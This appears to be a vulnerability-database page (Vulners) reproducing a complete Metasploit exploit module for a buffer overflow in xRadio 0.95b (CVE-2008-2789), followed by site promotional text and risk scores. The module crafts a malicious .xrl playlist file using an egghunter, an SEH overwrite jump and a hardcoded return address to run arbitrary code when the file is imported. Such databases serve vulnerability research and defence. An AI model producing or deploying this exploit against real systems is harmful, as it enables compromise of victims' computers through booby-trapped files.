Lucene search
K

xRadio 0.95b Buffer Overflow

🗓️ 15 Apr 2012 22:16:11Reported by b0telh0 <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 18 Views

xRadio 0.95b Buffer Overflow in file import allows arbitrary code executio

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2008-2789
20 Jun 200811:48
attackerkb
Circl
CVE-2008-2789
17 Jun 200800:00
circl
CVE
CVE-2008-2789
20 Jun 200810:00
cve
Cvelist
CVE-2008-2789
20 Jun 200810:00
cvelist
Exploit DB
BaSiC-CMS index.php r Remote SQL Injection Vulnerability
27 Nov 200800:00
exploitdb
NVD
CVE-2008-2789
20 Jun 200811:48
nvd
Prion
Sql injection
20 Jun 200811:48
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'xRadio 0.95b Buffer Overflow',
      'Description'     => %q{
        This module exploits a buffer overflow in xRadio 0.95b.
        Using the application to import a specially crafted xrl file,
        a buffer overflow occurs allowing arbitrary code execution.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'b0telh0 <me[at]gotgeek.com.br>',
        ],
      'References'      =>
        [
          [ 'CVE', '2008-2789' ],
          [ 'BID', '46290' ],
          [ 'EDB', '16141' ]
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => true
        },
      'Platform'        => 'win',
      'Payload'         =>
        {
          'Space' => 1000,
          'BadChars' => "\x00\x0a\x0d",
          'StackAdjustment' => -3500
        },
      'Targets'         =>
        [
          [ 'Windows Universal',
            {
              # pop eax - pop ebx - ret xradio.exe
              'Ret' => 0x0047E282
            }
          ],
        ],
      'Privileged'      => false,
      'DisclosureDate'  => '2011-02-08',
      'DefaultTarget'   => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The file name.', 'msf.xrl'])
      ])

  end

  def exploit
    eggoptions =
    {
      :checksum => true,
      :eggtag => 'w00t'
    }

    hunter,egg = generate_egghunter(payload.encoded, eggoptions)

    buffer =  rand_text_alpha_upper(4066-egg.length)
    buffer << egg
    buffer << make_nops(10)
    buffer << hunter
    buffer << "\xeb\xd8\xff\xff"      # nseh  jmp back 40 bytes
    buffer << [target.ret].pack('V')  # seh

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(buffer)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.8High risk
Vulners AI Score7.8
CVSS 27.5
EPSS0.22762
18